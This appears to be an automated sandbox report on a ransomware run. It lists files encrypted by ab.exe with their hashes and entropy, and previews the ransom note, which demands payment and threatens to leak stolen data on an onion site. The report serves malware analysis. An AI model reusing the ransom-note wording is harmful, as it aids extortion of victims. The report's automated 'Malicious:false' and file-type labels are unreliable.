                        C:\Users\user\Documents\GAOBCVIQIJ.docx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:DOS executable (COM, 0x8C-variant)
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9774485548647185
                        Encrypted:false
                        SSDEEP:192:DlRAdYaiKM9AyTan0q0pbGddw91P2vl8005mV+n:xHaiKM9LTo0q0pCdmHP2SjV
                        MD5:6A8B803018F15DF09E956F0452506416
                        SHA1:DBBB7284D7CE111DDBA9BF384A64DBC13E13E1E9
                        SHA-256:45369EC2F9CC5C35957892C3BD991CF9C0AA6CC128E46D09AB79EA61765476E6
                        SHA-512:98D012E161745993DD2DA6CF40BDE589AB8A8602338991E005CBE72E271AE970F5C5739C22C35F027D4D94167BEAB129DC63E8D389F0E1B67F66997686144239
                        Malicious:false
                        C:\Users\user\Documents\GAOBCVIQIJ.docx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:DOS executable (COM, 0x8C-variant)
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9774485548647185
                        Encrypted:false
                        SSDEEP:192:DlRAdYaiKM9AyTan0q0pbGddw91P2vl8005mV+n:xHaiKM9LTo0q0pCdmHP2SjV
                        MD5:6A8B803018F15DF09E956F0452506416
                        SHA1:DBBB7284D7CE111DDBA9BF384A64DBC13E13E1E9
                        SHA-256:45369EC2F9CC5C35957892C3BD991CF9C0AA6CC128E46D09AB79EA61765476E6
                        SHA-512:98D012E161745993DD2DA6CF40BDE589AB8A8602338991E005CBE72E271AE970F5C5739C22C35F027D4D94167BEAB129DC63E8D389F0E1B67F66997686144239
                        Malicious:false
                        C:\Users\user\Documents\GAOBCVIQIJ.pdf
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.976281289227903
                        Encrypted:false
                        SSDEEP:192:n1onrqTYRauwhprNWHWJW712a6ElZKu/V+n:n1or2NW2AZho
                        MD5:A6FC66F9031DAAB2F274CDD29D76E78C
                        SHA1:4223A091E1ED2AF160C2A7B29E8CEE79D1050036
                        SHA-256:1FEC9CE17438CF44B3EF047512CFDBB73D49A45A70FFFC8DC1F7214C9264F9D1
                        SHA-512:A084E42725D3A4DB848BA27EC139977DBE1EF373395D10597178A62C1D9DB31A04E47286AB80FBFAA9BA51B022760103092D0F03801285B21B3F54B3704FB74F
                        Malicious:false
                        C:\Users\user\Documents\GAOBCVIQIJ.pdf.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.976281289227903
                        Encrypted:false
                        SSDEEP:192:n1onrqTYRauwhprNWHWJW712a6ElZKu/V+n:n1or2NW2AZho
                        MD5:A6FC66F9031DAAB2F274CDD29D76E78C
                        SHA1:4223A091E1ED2AF160C2A7B29E8CEE79D1050036
                        SHA-256:1FEC9CE17438CF44B3EF047512CFDBB73D49A45A70FFFC8DC1F7214C9264F9D1
                        SHA-512:A084E42725D3A4DB848BA27EC139977DBE1EF373395D10597178A62C1D9DB31A04E47286AB80FBFAA9BA51B022760103092D0F03801285B21B3F54B3704FB74F
                        Malicious:false
                        C:\Users\user\Documents\GAOBCVIQIJ\BNAGMGSPLO.jpg
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978580903469927
                        Encrypted:false
                        SSDEEP:192:KqIsl3ttRIjiryxEuk2r0SzCzzQy2BzjEFetuV+n:KqI0RIgqEuk2fz+N2Bz4FG7
                        MD5:26554AD741CD3BB34D9BE63A4609CB78
                        SHA1:8F9C143F1E42E68A3BDED3CF5107DB5ED2C6C861
                        SHA-256:E1ED686D36969596D39A9B8E0F6A6B88A46E3A7F56FBCB68C5A46BE8B5E7B9DF
                        SHA-512:8AB405CEF2846D5BEC06E0D846AB2EFEEE6C509EEC7E05A4BB7A3679D4FAF7B61693036358608D20C022280CC392133F5038E0C7DC01D0B6AE762024E2175515
                        Malicious:false
                        C:\Users\user\Documents\GAOBCVIQIJ\BNAGMGSPLO.jpg.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978580903469927
                        Encrypted:false
                        SSDEEP:192:KqIsl3ttRIjiryxEuk2r0SzCzzQy2BzjEFetuV+n:KqI0RIgqEuk2fz+N2Bz4FG7
                        MD5:26554AD741CD3BB34D9BE63A4609CB78
                        SHA1:8F9C143F1E42E68A3BDED3CF5107DB5ED2C6C861
                        SHA-256:E1ED686D36969596D39A9B8E0F6A6B88A46E3A7F56FBCB68C5A46BE8B5E7B9DF
                        SHA-512:8AB405CEF2846D5BEC06E0D846AB2EFEEE6C509EEC7E05A4BB7A3679D4FAF7B61693036358608D20C022280CC392133F5038E0C7DC01D0B6AE762024E2175515
                        Malicious:false
                        C:\Users\user\Documents\GAOBCVIQIJ\EEGWXUHVUG.png
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9808293019820775
                        Encrypted:false
                        SSDEEP:192:XwWsIdBAI2rNNREeye0AnNsWXrrJsbyQtTM5/ooaQtkKx+PHmkTcWdkFyV+n:XwWDARV5IFW7YjtQ2bE49/d0
                        MD5:9D389747B493661E916D84F0296B4905
                        SHA1:3D288034A6A9BFD7CA252878A8679290FCF48EA6
                        SHA-256:5B91DC3C680A0BFB917C05491AE84DB83718D50762CBAE9BADDC72D27AE528B1
                        SHA-512:C2DB72E941C53D6FB189A0681DE4E098A1EA4FBA9AEA7FD550D84C47B7260D9AFD8F708B5A426F6ADBF2D9AE3AE58137757A3E09AD803C9903B8E8675ECF5133
                        Malicious:false
                        C:\Users\user\Documents\GAOBCVIQIJ\EEGWXUHVUG.png.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9808293019820775
                        Encrypted:false
                        SSDEEP:192:XwWsIdBAI2rNNREeye0AnNsWXrrJsbyQtTM5/ooaQtkKx+PHmkTcWdkFyV+n:XwWDARV5IFW7YjtQ2bE49/d0
                        MD5:9D389747B493661E916D84F0296B4905
                        SHA1:3D288034A6A9BFD7CA252878A8679290FCF48EA6
                        SHA-256:5B91DC3C680A0BFB917C05491AE84DB83718D50762CBAE9BADDC72D27AE528B1
                        SHA-512:C2DB72E941C53D6FB189A0681DE4E098A1EA4FBA9AEA7FD550D84C47B7260D9AFD8F708B5A426F6ADBF2D9AE3AE58137757A3E09AD803C9903B8E8675ECF5133
                        Malicious:false
                        C:\Users\user\Documents\GAOBCVIQIJ\EFOYFBOLXA.mp3
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.97996259530454
                        Encrypted:false
                        SSDEEP:192:ZvG31SaR6Yni+msLxZ0FzkTQCvkf637vIEah5Dj0a4z2Q6V+n:RkU+msLxuFzkRvkAvIEahS8Q/
                        MD5:C39FA9042CAB3AC36D60794A60FE545B
                        SHA1:72B34A85DFBFF7C4AEDD8546F2F1AEF2F45C6BD6
                        SHA-256:8A660691D65DB7B1D25337F659D8F23996FF2CC0593CD97AE93E43A79394A151
                        SHA-512:23360DFBD57C048342C61B87AAD7990420C6209C1BF66A903707E6D64CA889BD9B69110F265373EAA4FC26665B1F82B90958C4B6D19BC3389F80636CEB70C515
                        Malicious:false
                        C:\Users\user\Documents\GAOBCVIQIJ\EFOYFBOLXA.mp3.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.97996259530454
                        Encrypted:false
                        SSDEEP:192:ZvG31SaR6Yni+msLxZ0FzkTQCvkf637vIEah5Dj0a4z2Q6V+n:RkU+msLxuFzkRvkAvIEahS8Q/
                        MD5:C39FA9042CAB3AC36D60794A60FE545B
                        SHA1:72B34A85DFBFF7C4AEDD8546F2F1AEF2F45C6BD6
                        SHA-256:8A660691D65DB7B1D25337F659D8F23996FF2CC0593CD97AE93E43A79394A151
                        SHA-512:23360DFBD57C048342C61B87AAD7990420C6209C1BF66A903707E6D64CA889BD9B69110F265373EAA4FC26665B1F82B90958C4B6D19BC3389F80636CEB70C515
                        Malicious:false
                        C:\Users\user\Documents\GAOBCVIQIJ\GAOBCVIQIJ.docx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980161631072431
                        Encrypted:false
                        SSDEEP:192:pEdRyPyw2SYVE70i+VoLln0wfAbk0p5YyslZ4ssYgbhGhcGzDzV+n:pEdRyPyPSYVE7oiln055Y9Z4sNgbhog
                        MD5:9C7AC54E8AA5E8BC3A4B8A6FAF95C9A7
                        SHA1:43944AB7AB31CFA29C0CA9D602D9365C41E69F40
                        SHA-256:A96C157D9AF7576380653BAE7D61B61A8E7D0A05EACA7C55343466D2C82ABC46
                        SHA-512:0C50BF89965C36F8542DB0A9BAADCFDF175B3B1EF6A42002DF93F138336D491F5D8EBDB5090DEB45F256248EFD80EAE015C1EDCCEA97F285CFD0F58E9A81348B
                        Malicious:false
                        C:\Users\user\Documents\GAOBCVIQIJ\GAOBCVIQIJ.docx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980161631072431
                        Encrypted:false
                        SSDEEP:192:pEdRyPyw2SYVE70i+VoLln0wfAbk0p5YyslZ4ssYgbhGhcGzDzV+n:pEdRyPyPSYVE7oiln055Y9Z4sNgbhog
                        MD5:9C7AC54E8AA5E8BC3A4B8A6FAF95C9A7
                        SHA1:43944AB7AB31CFA29C0CA9D602D9365C41E69F40
                        SHA-256:A96C157D9AF7576380653BAE7D61B61A8E7D0A05EACA7C55343466D2C82ABC46
                        SHA-512:0C50BF89965C36F8542DB0A9BAADCFDF175B3B1EF6A42002DF93F138336D491F5D8EBDB5090DEB45F256248EFD80EAE015C1EDCCEA97F285CFD0F58E9A81348B
                        Malicious:false
                        C:\Users\user\Documents\GAOBCVIQIJ\QCFWYSKMHA.xlsx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977284422053082
                        Encrypted:false
                        SSDEEP:192:8qz8XYxaJg6Qekzm0UG220ERX8DM9V0PHl903YDjc7V+n:8Qoh5k/N0ERX8DaVslcY/c8
                        MD5:B453139FB0F8F604A0DEA015277BD1AE
                        SHA1:54FE0F980D58A4A4A8DD29A9EDE74EC15C38FBF7
                        SHA-256:1165083D749CA698297396FED400A1FBECCCB7DE271301BDDE117167EFB413D5
                        SHA-512:A4BB81F57E2C492F962563122EFFFC3B7B65B64DC176996C3EA09AE453890EAEFCB4136F03A2D9D6FB0C2FE390C7642F9B7BB691679F12E71243E0BFF04F5A09
                        Malicious:false
                        C:\Users\user\Documents\GAOBCVIQIJ\QCFWYSKMHA.xlsx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977284422053082
                        Encrypted:false
                        SSDEEP:192:8qz8XYxaJg6Qekzm0UG220ERX8DM9V0PHl903YDjc7V+n:8Qoh5k/N0ERX8DaVslcY/c8
                        MD5:B453139FB0F8F604A0DEA015277BD1AE
                        SHA1:54FE0F980D58A4A4A8DD29A9EDE74EC15C38FBF7
                        SHA-256:1165083D749CA698297396FED400A1FBECCCB7DE271301BDDE117167EFB413D5
                        SHA-512:A4BB81F57E2C492F962563122EFFFC3B7B65B64DC176996C3EA09AE453890EAEFCB4136F03A2D9D6FB0C2FE390C7642F9B7BB691679F12E71243E0BFF04F5A09
                        Malicious:false
                        C:\Users\user\Documents\GAOBCVIQIJ\SUAVTZKNFL.pdf
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979649468554294
                        Encrypted:false
                        SSDEEP:192:MR+H9Yir+NspacgK3uIOmCt2loxg2myG03JEHxetX+3XvnLhK5vVn8V+n:n9Zr+NsZ3uIWngAL3JEH++HvnLhY9nd
                        MD5:B49252644CD82CCBB66A4D2CB4E488D7
                        SHA1:57BADEE540580FF799258263F92D72555040BFF3
                        SHA-256:13E148E94ECD364E288C744050BA78FC4E00CDDB1EDB60808FFD683EB507EC8F
                        SHA-512:DA2DCD94D9FA760F9CB44CBD23526F0C8869D1BCED438981E3CE84D3E97C835FDB5F47942717786A2FF68ED9A4C7C66B29F977537FEDAB71C5107AD9484677F5
                        Malicious:false
                        C:\Users\user\Documents\GAOBCVIQIJ\SUAVTZKNFL.pdf.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979649468554294
                        Encrypted:false
                        SSDEEP:192:MR+H9Yir+NspacgK3uIOmCt2loxg2myG03JEHxetX+3XvnLhK5vVn8V+n:n9Zr+NsZ3uIWngAL3JEH++HvnLhY9nd
                        MD5:B49252644CD82CCBB66A4D2CB4E488D7
                        SHA1:57BADEE540580FF799258263F92D72555040BFF3
                        SHA-256:13E148E94ECD364E288C744050BA78FC4E00CDDB1EDB60808FFD683EB507EC8F
                        SHA-512:DA2DCD94D9FA760F9CB44CBD23526F0C8869D1BCED438981E3CE84D3E97C835FDB5F47942717786A2FF68ED9A4C7C66B29F977537FEDAB71C5107AD9484677F5
                        Malicious:false
                        C:\Users\user\Documents\GAOBCVIQIJ\uCLrcwQ_readme_.txt
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:ASCII text, with very long lines, with CRLF, CR, LF line terminators
                        Category:dropped
                        Size (bytes):3772
                        Entropy (8bit):5.732394345207235
                        Encrypted:false
                        SSDEEP:48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH69U:L95zhLNbXGZUe7Ka6pU6i9fLrvE69USI
                        MD5:4E2E4CDD33916285D0D97DE5AAB49E55
                        SHA1:994BD5DD3D3ABA3685E3C42522DA92EF40E54BF0
                        SHA-256:ADFA4D5515BC6793C4017CBE50F47FFF3BFF7644C2A1825F7989260346D99FDD
                        SHA-512:582D0830ACCD5BD7BADC0D80B37F522C17912D02BD3E94A8DD3121E1E7A95A736FF1867281064EC51CB7B315ABE8CAF2C0818281443B89C3B75399D3A34EA038
                        Malicious:false
                        Preview: -------=== Your network has been infected! ===-------.........***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED *****************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------
                        C:\Users\user\Documents\LSBIHQFDVT.docx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977615054441206
                        Encrypted:false
                        SSDEEP:192:xUWaZDPVfyhbT1ZBmaexeb2sO985AhugyYfRJiMV+n:xUWaZxyhtaa2eb2sOyUusRcN
                        MD5:55E9CC319B8BB92E419A6DA089EBAAC4
                        SHA1:18CF2864775F86597F272929E31A3D50FCEEAC4B
                        SHA-256:76608A8B6051957AC660C97581EC3E59569C55B28212058E08DC9903545F0866
                        SHA-512:9490B7DA1410118E32D24A90769A29CE1997DBE4EF46A58A0BD96C5AF47416AEB6E0D0906FE8C80316BC79E95C1CAD2FC54084FA48F09E2BF0313A840BED4446
                        Malicious:false
                        C:\Users\user\Documents\LSBIHQFDVT.docx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977615054441206
                        Encrypted:false
                        SSDEEP:192:xUWaZDPVfyhbT1ZBmaexeb2sO985AhugyYfRJiMV+n:xUWaZxyhtaa2eb2sOyUusRcN
                        MD5:55E9CC319B8BB92E419A6DA089EBAAC4
                        SHA1:18CF2864775F86597F272929E31A3D50FCEEAC4B
                        SHA-256:76608A8B6051957AC660C97581EC3E59569C55B28212058E08DC9903545F0866
                        SHA-512:9490B7DA1410118E32D24A90769A29CE1997DBE4EF46A58A0BD96C5AF47416AEB6E0D0906FE8C80316BC79E95C1CAD2FC54084FA48F09E2BF0313A840BED4446
                        Malicious:false
                        C:\Users\user\Documents\LSBIHQFDVT\GAOBCVIQIJ.pdf
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.982227733320917
                        Encrypted:false
                        SSDEEP:192:LbWQ8a4CtPjwxcYPKyAuLLaIq4jQR0z8M+ZOhzt0+xV+n:LbWQacYPKBsNqUQRNM1z8
                        MD5:F6CD6FE545AE7A38F19BCD79583A8FDF
                        SHA1:D1A93CB613A18B06C5F5DC7B7CFDC6F775A86415
                        SHA-256:7A74FC6D5C394B84BBCDE92D041D918864A1C55111874811E8A191B27D7BADEC
                        SHA-512:6230B0C14EEEC93AA8CFB425BB510BC1D9F7FBDE2620E741297EF4A5AE3B6485788BF3CE981BC62442033E79572AB467CA0CA9D3FC5A25C51E4DCDB4A604EE1A
                        Malicious:false
                        C:\Users\user\Documents\LSBIHQFDVT\GAOBCVIQIJ.pdf.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.982227733320917
                        Encrypted:false
                        SSDEEP:192:LbWQ8a4CtPjwxcYPKyAuLLaIq4jQR0z8M+ZOhzt0+xV+n:LbWQacYPKBsNqUQRNM1z8
                        MD5:F6CD6FE545AE7A38F19BCD79583A8FDF
                        SHA1:D1A93CB613A18B06C5F5DC7B7CFDC6F775A86415
                        SHA-256:7A74FC6D5C394B84BBCDE92D041D918864A1C55111874811E8A191B27D7BADEC
                        SHA-512:6230B0C14EEEC93AA8CFB425BB510BC1D9F7FBDE2620E741297EF4A5AE3B6485788BF3CE981BC62442033E79572AB467CA0CA9D3FC5A25C51E4DCDB4A604EE1A
                        Malicious:false
                        C:\Users\user\Documents\LSBIHQFDVT\LSBIHQFDVT.docx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977936660904519
                        Encrypted:false
                        SSDEEP:192:0zOC6dAYBGsCaj06ouzzTGx22ayqj+p7J4FFPH358tzjSBV+n:0yC6BrCA0oXTG5ayqje7EkzjSe
                        MD5:2720F41D41ED4BEEEEA24EF7904B8617
                        SHA1:C3299ACC1E2715E0A9A694801788D171F6CAB20B
                        SHA-256:F444AD80D0E27013BDE4615DB1FCD85ABA22AFC943CEDC7D7F2957B3DD5BCB32
                        SHA-512:A7E3F2973B33ABC0B6C43FE82D301DE8D56DCFA3D5613B8C7A16AFCDB078842B52B315474631025BF0AA940162A11377849335FC93B709011E7CAE591169F5BD
                        Malicious:false
                        C:\Users\user\Documents\LSBIHQFDVT\LSBIHQFDVT.docx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977936660904519
                        Encrypted:false
                        SSDEEP:192:0zOC6dAYBGsCaj06ouzzTGx22ayqj+p7J4FFPH358tzjSBV+n:0yC6BrCA0oXTG5ayqje7EkzjSe
                        MD5:2720F41D41ED4BEEEEA24EF7904B8617
                        SHA1:C3299ACC1E2715E0A9A694801788D171F6CAB20B
                        SHA-256:F444AD80D0E27013BDE4615DB1FCD85ABA22AFC943CEDC7D7F2957B3DD5BCB32
                        SHA-512:A7E3F2973B33ABC0B6C43FE82D301DE8D56DCFA3D5613B8C7A16AFCDB078842B52B315474631025BF0AA940162A11377849335FC93B709011E7CAE591169F5BD
                        Malicious:false
                        C:\Users\user\Documents\LSBIHQFDVT\PWCCAWLGRE.png
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977788314831574
                        Encrypted:false
                        SSDEEP:192:HloZGTnxJgcNGahTt5ZfFJZsJmZNIqCJgU1Gpn/1CQW3sfQV+n:HloZeJHca9t/fNsWBE1A23sB
                        MD5:CB2A95C84816B50531A368BA1FE5E38D
                        SHA1:BB1746C18C67A847375DEE23BB874214E346D198
                        SHA-256:8D329F8EC9688DDF73F40F8BACEFFE1D1404C2AA2C39805759B5D8BD5F90A29C
                        SHA-512:FFA8A4216E1B4B6A33B0B8832D230F0C10D547180358341EA41F373F2A5394D7250F14FCB1DA0EA6A4A8F308A6B79DD334A50DFEE3BA71A4B9648F55907F68B0
                        Malicious:false
                        C:\Users\user\Documents\LSBIHQFDVT\PWCCAWLGRE.png.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977788314831574
                        Encrypted:false
                        SSDEEP:192:HloZGTnxJgcNGahTt5ZfFJZsJmZNIqCJgU1Gpn/1CQW3sfQV+n:HloZeJHca9t/fNsWBE1A23sB
                        MD5:CB2A95C84816B50531A368BA1FE5E38D
                        SHA1:BB1746C18C67A847375DEE23BB874214E346D198
                        SHA-256:8D329F8EC9688DDF73F40F8BACEFFE1D1404C2AA2C39805759B5D8BD5F90A29C
                        SHA-512:FFA8A4216E1B4B6A33B0B8832D230F0C10D547180358341EA41F373F2A5394D7250F14FCB1DA0EA6A4A8F308A6B79DD334A50DFEE3BA71A4B9648F55907F68B0
                        Malicious:false
                        C:\Users\user\Documents\LSBIHQFDVT\QCFWYSKMHA.jpg
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.981199434264514
                        Encrypted:false
                        SSDEEP:192:aAcfOxz2G7wdknkSsM/huZCO/WF6L9oiVIyQ4e0T1vXsvSaiGV+n:BbxzT7wdikSsMICKW2uiVDQ4/USaij
                        MD5:8D1E252E9F62995AD91F618034A67CC7
                        SHA1:6187D26E85C6C6754FDD8112D53113C04AD275A5
                        SHA-256:CDB9246CFB72E0E7E184E369898F50904ED3913E2E7D9D4DDAB531931AD0BB42
                        SHA-512:F0DDB6FF6FB2587E3BE48FD51EFE1E03AAC5A16523D1BF688BDA950D59AF4806C2B21E9523573C70F03F07F6796EC60521F21FA0C1DAEFF06AEEF97455C3D73E
                        Malicious:false
                        C:\Users\user\Documents\LSBIHQFDVT\QCFWYSKMHA.jpg.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.981199434264514
                        Encrypted:false
                        SSDEEP:192:aAcfOxz2G7wdknkSsM/huZCO/WF6L9oiVIyQ4e0T1vXsvSaiGV+n:BbxzT7wdikSsMICKW2uiVDQ4/USaij
                        MD5:8D1E252E9F62995AD91F618034A67CC7
                        SHA1:6187D26E85C6C6754FDD8112D53113C04AD275A5
                        SHA-256:CDB9246CFB72E0E7E184E369898F50904ED3913E2E7D9D4DDAB531931AD0BB42
                        SHA-512:F0DDB6FF6FB2587E3BE48FD51EFE1E03AAC5A16523D1BF688BDA950D59AF4806C2B21E9523573C70F03F07F6796EC60521F21FA0C1DAEFF06AEEF97455C3D73E
                        Malicious:false
                        C:\Users\user\Documents\LSBIHQFDVT\SUAVTZKNFL.mp3
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979178222944676
                        Encrypted:false
                        SSDEEP:192:92snKpu0PGTw4C//1FSQ8E0rFVQy1zLTE2z/CvkBq4S57GsihV+n:xau003C//SQ8E0hLSveq4Q
                        MD5:7E250C31357C760CAC44DF3C9F8B3BA2
                        SHA1:D85FF1AB6376A028B3E679F276A3F68D3BFDF31D
                        SHA-256:8D2E0D94B494DA12BCDDB77CDD2B607CF24927C56DB3A9DC58A011DF0B73B44B
                        SHA-512:56833917A0029DA5A13F331D0B3EBA1FAB594870DA1C506A87434A89D1E8AC49775D21A32E360C92CFF8FB24BDA9EB1C6B2BD91919BE0CE0F546B3C0EF5EC515
                        Malicious:false
                        C:\Users\user\Documents\LSBIHQFDVT\SUAVTZKNFL.mp3.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979178222944676
                        Encrypted:false
                        SSDEEP:192:92snKpu0PGTw4C//1FSQ8E0rFVQy1zLTE2z/CvkBq4S57GsihV+n:xau003C//SQ8E0hLSveq4Q
                        MD5:7E250C31357C760CAC44DF3C9F8B3BA2
                        SHA1:D85FF1AB6376A028B3E679F276A3F68D3BFDF31D
                        SHA-256:8D2E0D94B494DA12BCDDB77CDD2B607CF24927C56DB3A9DC58A011DF0B73B44B
                        SHA-512:56833917A0029DA5A13F331D0B3EBA1FAB594870DA1C506A87434A89D1E8AC49775D21A32E360C92CFF8FB24BDA9EB1C6B2BD91919BE0CE0F546B3C0EF5EC515
                        Malicious:false
                        C:\Users\user\Documents\LSBIHQFDVT\ZQIXMVQGAH.xlsx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.97770889640404
                        Encrypted:false
                        SSDEEP:192:1OFyJIuTyLinB+wu7FftKhn1W6MML5XhmBDOPxzjz2Ln1Xd9hc6V+n:1SiIunC7uhnvMMNhHPdYTq
                        MD5:9F58A7CC877B753E2FA7D58109062E52
                        SHA1:BBFA043B847711BAC7AB1860E1634B29CFAA22DE
                        SHA-256:C67E3F8CAC95F1FFC71C07C6F17B1641FC0DEBBA397E972DCADFF6C7BE6B8E4D
                        SHA-512:0F3F55FD418EA12D55F0C351E043E3D941465E0C0CF04C63302D14A1D5C74572B9E8850365FE9EC9B34C0EF463D6367DB4CB5E28198570F8A0703B219681ACB4
                        Malicious:false
                        C:\Users\user\Documents\LSBIHQFDVT\ZQIXMVQGAH.xlsx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.97770889640404
                        Encrypted:false
                        SSDEEP:192:1OFyJIuTyLinB+wu7FftKhn1W6MML5XhmBDOPxzjz2Ln1Xd9hc6V+n:1SiIunC7uhnvMMNhHPdYTq
                        MD5:9F58A7CC877B753E2FA7D58109062E52
                        SHA1:BBFA043B847711BAC7AB1860E1634B29CFAA22DE
                        SHA-256:C67E3F8CAC95F1FFC71C07C6F17B1641FC0DEBBA397E972DCADFF6C7BE6B8E4D
                        SHA-512:0F3F55FD418EA12D55F0C351E043E3D941465E0C0CF04C63302D14A1D5C74572B9E8850365FE9EC9B34C0EF463D6367DB4CB5E28198570F8A0703B219681ACB4
                        Malicious:false
                        C:\Users\user\Documents\LSBIHQFDVT\uCLrcwQ_readme_.txt
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:ASCII text, with very long lines, with CRLF, CR, LF line terminators
                        Category:dropped
                        Size (bytes):3757
                        Entropy (8bit):5.7295047567070965
                        Encrypted:false
                        SSDEEP:48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH69K:L95zhLNbXGZUe7Ka6pU6i9fLrvE69USm
                        MD5:3C41F7CA18B8945F6821481356FC9244
                        SHA1:AD871AF22DB7CADE6E00759B53747B9B37772AC2
                        SHA-256:1C5ABC28C85D76E02D08CC3D29DAA53E5B8AEDD8945FED659BABD5AA98DE57F8
                        SHA-512:C092E6807636E362DA896D9C0EF5872330341EDD5D1575358D4D40814B60E0548CBDD9EB15F70F06CBA57AC9DCC496502069DB52CA2116AE43680D8F6A7F0886
                        Malicious:false
                        Preview: -------=== Your network has been infected! ===-------.........***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED *****************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------
                        C:\Users\user\Documents\PALRGUCVEH.png
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979224689359224
                        Encrypted:false
                        SSDEEP:192:G/UbDx61spAWmdbJA0GdY0hi4isXb3EqKfbQz8V+n:WkAam5JA0GvTnDzd
                        MD5:802C203B29D025FEC9BB25C066F739A2
                        SHA1:47659324F6263A6C875F5946FE84B9A092FA6B84
                        SHA-256:0359E5B3909D3DD795479C944783EE95C7BDE7D08B1E7C9069F12B50D3EC2AFC
                        SHA-512:DD4E02D09F09BEAB80336A17639D5722D6609C2AC699B49426408C8C67AF2B8ECECFEE0AE1B515D31E1AF4DFAB3462D54FDC4358C3463036F6FC1DBCDA620BDB
